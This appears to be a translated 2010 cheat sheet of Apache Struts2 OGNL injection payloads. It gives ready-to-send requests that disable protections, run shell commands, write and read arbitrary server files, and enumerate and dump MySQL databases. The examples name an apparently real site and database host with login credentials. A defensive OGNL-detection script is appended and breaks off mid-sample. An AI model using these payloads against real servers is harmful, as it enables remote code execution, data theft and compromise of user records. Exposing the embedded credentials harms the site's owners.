This is the 2010 version; for other versions, modify it on this basis. More tips are welcome.
Physical path of the website:
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(43req.getRealPath(%22u005c%22))')(d))&(i99)(('43xman.getWriter().close()')(d))
Java version:
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.lang.System@getProperty(%22java.version%22))')(d))&(i99)(('43xman.getWriter().close()')(d))
os.name:
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.lang.System@getProperty(%22os.name%22))')(d))&(i99)(('43xman.getWriter().close()')(d))
os.arch
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.lang.System@getProperty(%22os.arch%22))')(d))&(i99)(('43xman.getWriter().close()')(d))
os.version
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.lang.System@getProperty(%22os.version%22))')(d))&(i99)(('43xman.getWriter().close()')(d))
user.name
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.lang.System@getProperty(%22user.name%22))')(d))&(i99)(('43xman.getWriter().close()')(d))
user.home
Physical path of the website:
java.home: 43req.getRealPath(%22u005c%22)
java.version: @java.lang.System@getProperty(%22java.version%22)
os.name: @java.lang.System@getProperty(%22os.name%22)
os.arch: @java.lang.System@getProperty(%22os.arch%22)
os.version: @java.lang.System@getProperty(%22os.version%22)
user.name: @java.lang.System@getProperty(%22user.name%22)
user.home: /usr/share/jbossas
user.dir: /var/lib/jbossas/bin
java.class.version: 49.0
java.class.path: /var/lib/jbossas/bin/run.jar:/usr/lib/jvm/java/lib/tools.jar
java.library.path: /usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/lib/amd64/server:/usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/lib/amd64:/usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/../lib/amd64
file.separator: /
path.separator: :
java.vendor: Sun Microsystems Inc.
java.vendor.url: http://java.sun.com/
java.vm.specification.version: 1.0
java.vm.specification.vendor: Sun Microsystems Inc.
java.vm.specification.name: Java Virtual Machine Specification
java.vm.version: 1.5.0_13-b05
java.vm.vendor: Sun Microsystems Inc.
java.vm.name: Java HotSpot(TM) 64-Bit Server VM
java.specification.version: 1.5
java.specification.vender:
java.specification.name: Java Platform API Specification
java.io.tmpdir: /tmp
Execute CMD
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(h)(('[email protected]@getRuntime().exec(43req.getParameter(%22cmd%22))')(d))&(i)(('43webRootzproreader75new40java.io.DataInputStream(43webRootzpro.getInputStream())')(d))&(i01)(('43webStr75new40byte[51020]')(d))&(i1)(('43webRootzproreader.readFully(43webStr)')(d))&(i111)(('43webStr1275new40java.lang.String(43webStr)')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(43webStr12)')(d))&(i99)(('43xman.getWriter().close()')(d))&cmd=ls
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(h)(('[email protected]@getRuntime().exec(43req.getParameter(%22cmd%22))')(d))&(i)(('43webRootzproreader75new40java.io.DataInputStream(43webRootzpro.getInputStream())')(d))&(i01)(('43webStr75new40byte[51020]')(d))&(i1)(('43webRootzproreader.readFully(43webStr)')(d))&(i111)(('43webStr1275new40java.lang.String(43webStr)')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(43webStr12)')(d))&(i99)(('43xman.getWriter().close()')(d))&cmd=ls+-la
http://www.quam.net/index.action?request_locale=zh_TW&
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(h)(('[email protected]@getRuntime().exec(43req.getParameter(%22cmd%22))')(d))&(i)(('43webRootzproreader75new40java.io.DataInputStream(43webRootzpro.getInputStream())')(d))&(i01)(('43webStr75new40byte[51020]')(d))&(i1)(('43webRootzproreader.readFully(43webStr)')(d))&(i111)(('43webStr1275new40java.lang.String(43webStr)')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(43webStr12)')(d))&(i99)(('43xman.getWriter().close()')(d))&cmd=cat+%2Ftmp%2Fhsmw.txt
File upload request data
('u0023_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('u0023context['xwork.MethodAccessor.denyMethodExecution']u003du0023foo')(u0023foou003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('43fos75new40java.io.FileOutputStream(43req.getParameter(%22path%22))')(d))&(i3)(('43fos.write(43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('43fos.close()')(d))
POST
t=neirong&path=%2Ftmp%2Fhsmw.txt
To adapt the POST version, just add &.
('u0023_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('u0023context['xwork.MethodAccessor.denyMethodExecution']u003du0023foo')(u0023foou003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('43fos75new40java.io.FileOutputStream(43req.getParameter(%22path%22))')(d))&(i3)(('43fos.write(43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('43fos.close()')(d))
&t=neirong&path=%2Ftmp%2Fhsmw.txt
('u0023_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('u0023context['xwork.MethodAccessor.denyMethodExecution']u003du0023foo')(u0023foou003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('43fos75new40java.io.FileOutputStream(43req.getParameter(%22path%22))')(d))&(i3)(('43fos.write(43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('43fos.close()')(d))
&t=neirong&path=/tmp/hsmw.txt
List directories
Check readability by return value (true): @java.io.File@listRoots()[0].isDirectory()
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots()[0].isDirectory())')(d))&(i99)(('43xman.getWriter().close()')(d))
Number of directories: @java.io.File@listRoots().length
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots().length)')(d))&(i99)(('43xman.getWriter().close()')(d))
First array element: @java.io.File@listRoots()[0])
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots()[0])')(d))&(i99)(('43xman.getWriter().close()')(d))
Array return value: @java.io.File@listRoots()[0].listFiles().length
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles().length)')(d))&(i99)(('43xman.getWriter().close()')(d))
First entry: @java.io.File@listRoots()[0].listFiles()[0].getName()
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[0].getName())')(d))&(i99)(('43xman.getWriter().close()')(d))
Second entry: @java.io.File@listRoots()[0].listFiles()[1].getName()
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[1].getName())')(d))&(i99)(('43xman.getWriter().close()')(d))
How to tell that an entry is a file, return value (false): @java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].isDirectory()
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].isDirectory())')(d))&(i99)(('43xman.getWriter().close()')(d))
Determine the file size: @java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].length()
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].length())')(d))&(i99)(('43xman.getWriter().close()')(d))
Output file contents
@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22])
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i1)(('43dis75new40java.io.DataInputStream(new40java.io.FileInputStream(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22]))')(d))&(i2)(('43dos75new40java.io.DataOutputStream(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())')(d))&(i3)(('43buff75new40byte[102400]')(d))&(i4)(('43dis.skipBytes(0)')(d))&(i5)(('43size7543dis.read(43buff)')(d))&(i6)(('43dis.close()')(d))&(i7)(('43dos.writeInt(43size)')(d))&(i95)(('43dos.write(43buffu002c0u002c43size)')(d))&(i99)(('43dos.close()')(d))
@java.io.File@listRoots()[0].listFiles()[19].listFiles()[7])
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i1)(('43dis75new40java.io.DataInputStream(new40java.io.FileInputStream(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[7]))')(d))&(i2)(('43dos75new40java.io.DataOutputStream(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())')(d))&(i3)(('43buff75new40byte[102400]')(d))&(i4)(('43dis.skipBytes(0)')(d))&(i5)(('43size7543dis.read(43buff)')(d))&(i6)(('43dis.close()')(d))&(i7)(('43dos.writeInt(43size)')(d))&(i95)(('43dos.write(43buffu002c0u002c43size)')(d))&(i99)(('43dos.close()')(d))
—Database operations—
rs.absolute(1) is the 1st database
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i5)(('43rs7543con.getMetaData().getCatalogs()')(d))&(i6)(('43rs.absolute(1)')(d))&&(i95)(('43xman.getWriter().println(43rs.getString(1))')(d))&(i99)(('43xman.getWriter().close()')(d))&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
rs.absolute(2) is the 2nd database
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i5)(('43rs7543con.getMetaData().getCatalogs()')(d))&(i6)(('43rs.absolute(2)')(d))&&(i95)(('43xman.getWriter().println(43rs.getString(1))')(d))&(i99)(('43xman.getWriter().close()')(d))&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
And so on; stop when the returned value is empty. Comparison of database connection formats:
&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
&psw=password&user=account&clazz=database type&url=database URL (mind the URL encoding)
------
Database (table query): the original statement gains one extra parameter, &db=database name
rs.absolute(1) is the 1st table
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i5)(('43rs7543con.getMetaData().getTables(43req.getParameter(%22db%22)u002c%22%25%22u002c%22%25%22u002cnew40java.lang.String[]{%22TABLE%22})')(d))&(i6)(('43rs.absolute(1)')(d))&&(i95)(('43xman.getWriter().println(43rs.getString(%22TABLE_NAME%22))')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
rs.absolute(2) is the 2nd table
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i5)(('43rs7543con.getMetaData().getTables(43req.getParameter(%22db%22)u002c%22%25%22u002c%22%25%22u002cnew40java.lang.String[]{%22TABLE%22})')(d))&(i6)(('43rs.absolute(2)')(d))&&(i95)(('43xman.getWriter().println(43rs.getString(%22TABLE_NAME%22))')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
------
Database (column query): the original statement gains one extra parameter, &table=table
rs.absolute(1) is the 1st column
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i5)(('43rs7543con.getMetaData().getColumns(43req.getParameter(%22db%22)u002c%22%25%22u002c43req.getParameter(%22table%22)u002c%22%25%22)')(d))&(i6)(('43rs.absolute(1)')(d))&(i95)(('43xman.getWriter().println(43rs.getString(%22COLUMN_NAME%22))')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&psw=123456&table=userinfos&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
rs.absolute(2) is the 2nd column
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i5)(('43rs7543con.getMetaData().getColumns(43req.getParameter(%22db%22)u002c%22%25%22u002c43req.getParameter(%22table%22)u002c%22%25%22)')(d))&(i6)(('43rs.absolute(2)')(d))&(i95)(('43xman.getWriter().println(43rs.getString(%22COLUMN_NAME%22))')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&psw=123456&table=userinfos&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
-----
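Database (execute an SQL statement): the original statement gains one extra parameter, &sql=select+count%28*%29+from+userinfos
Note: this is GET data! With POST there is none, which is strange.
Count the columns of the query (example 1)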
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i45)(('43con.setCatalog(43req.getParameter(%22db%22))')(d))&(i5)(('43rs7543con.createStatement().executeQuery(43req.getParameter(%22sql%22))')(d))&(i95)(('43xman.getWriter().println(43rs.getMetaData().getColumnCount())')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&sql=select+count%28*%29+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
Count the columns of the query (example 2): a return value of 8 means 8 columns
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i45)(('43con.setCatalog(43req.getParameter(%22db%22))')(d))&(i5)(('43rs7543con.createStatement().executeQuery(43req.getParameter(%22sql%22))')(d))&(i95)(('43xman.getWriter().println(43rs.getMetaData().getColumnCount())')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
Once 8 is confirmed, use rs.getMetaData().getColumnName(1), then rs.getMetaData().getColumnName(2), and so on for the 8 columns.
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i45)(('43con.setCatalog(43req.getParameter(%22db%22))')(d))&(i5)(('43rs7543con.createStatement().executeQuery(43req.getParameter(%22sql%22))')(d))&(i95)(('43xman.getWriter().println(new40java.lang.StringBuilder().append(43rs.getMetaData().getColumnName(1)).append(%22%25%25%25%22).append(43rs.getMetaData().getColumnName(2)).append(%22%25%25%25%22).append(43rs.getMetaData().getColumnName(3)).append(%22%25%25%25%22).append(43rs.getMetaData().getColumnName(4)).append(%22%25%25%25%22).append(43rs.getMetaData().getColumnName(5)).append(%22%25%25%25%22).append(43rs.getMetaData().getColumnName(6)).append(%22%25%25%25%22).append(43rs.getMetaData().getColumnName(7)).append(%22%25%25%25%22).append(43rs.getMetaData().getColumnName(8)).append(%22%25%25%25%22))')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
To output content, use rs.next(); the first row is rs.next()
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i45)(('43con.setCatalog(43req.getParameter(%22db%22))')(d))&(i5)(('43rs7543con.createStatement().executeQuery(43req.getParameter(%22sql%22))')(d))&(i6)(('43rs.next()')(d))&(i95)(('43xman.getWriter().println(new40java.lang.StringBuilder().append(43rs.getString(1)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(2)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(3)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(4)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(5)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(6)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(7)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(8)%2b%22%22).append(%22%25%25%25%22))')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
The 2nd row is 43rs.next()%2b43rs.next(), that is, 2 of them
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i45)(('43con.setCatalog(43req.getParameter(%22db%22))')(d))&(i5)(('43rs7543con.createStatement().executeQuery(43req.getParameter(%22sql%22))')(d))&(i6)(('43rs.next()%2b43rs.next()')(d))&(i95)(('43xman.getWriter().println(new40java.lang.StringBuilder().append(43rs.getString(1)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(2)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(3)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(4)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(5)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(6)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(7)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(8)%2b%22%22).append(%22%25%25%25%22))')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
The 3rd takes 3.
The 4th takes 4: 43rs.next()%2b43rs.next()%2b43rs.next()%2b43rs.next()
Apparently the maximum is only a little over 200.
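A defensive counterpart to the parameter strings listed above, added here and not part of the original post: a scanner that decodes request parameter names and flags the OGNL markers those strings share (`_memberAccess`, `denyMethodExecution`, `#` variables, `@class@method` calls, `new java.` object creation). The log lines, the `SAFE_NAME` allowlist and all function names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Markers that recur in the parameter NAMES of the requests on this page.
MARKERS = {
    "member_access": re.compile(r"_memberAccess|allowStaticMethodAccess"),
    "deny_method_execution": re.compile(r"xwork\.MethodAccessor\.denyMethodExecution"),
    "ognl_variable": re.compile(r"#[A-Za-z_]\w*"),                     # '#' is usually sent as \u0023
    "static_call": re.compile(r"@[A-Za-z_][\w.$]*@[A-Za-z_]\w*"),      # @class@method
    "object_creation": re.compile(r"\bnew\s+java\."),
}
UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")
# Assumption: ordinary form fields look like "user.name" or "items[0]".
SAFE_NAME = re.compile(r"^[\w.\-\[\]]{1,128}$")
REQUEST = re.compile(r'"(?:GET|POST|PUT|HEAD) (\S+) HTTP/[\d.]+"')


def normalise(name: str) -> str:
    """Undo URL encoding (up to two layers) and \\uXXXX escapes in a parameter name."""
    prev, cur = None, name
    for _ in range(3):
        if cur == prev:
            break
        prev = cur
        cur = unquote_plus(cur)
        cur = UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), cur)
    return cur


def split_params(raw: str):
    """Split a raw query string or form body into (name, value) pairs without decoding."""
    for part in raw.split("&"):
        if part:
            name, _, value = part.partition("=")
            yield name, value


def scan(raw: str):
    """Return one finding per parameter whose name is not a plain field name."""
    findings = []
    for name, _ in split_params(raw):
        decoded = normalise(name)
        hits = sorted(k for k, rx in MARKERS.items() if rx.search(decoded))
        if hits or not SAFE_NAME.match(decoded):
            findings.append({"name": decoded, "markers": hits})
    return findings


def scan_access_log(lines):
    """Return (line_number, findings) for every request carrying OGNL markers."""
    report = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        _, _, query = m.group(1).partition("?")
        findings = scan(query)
        if any(f["markers"] for f in findings):
            report.append((n, findings))
    return report


# Constructed access-log lines (documentation IP range), not captured traffic.
SAMPLE_LOG = r"""
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.action?request_locale=zh_TW&page=2 HTTP/1.1" 200 512
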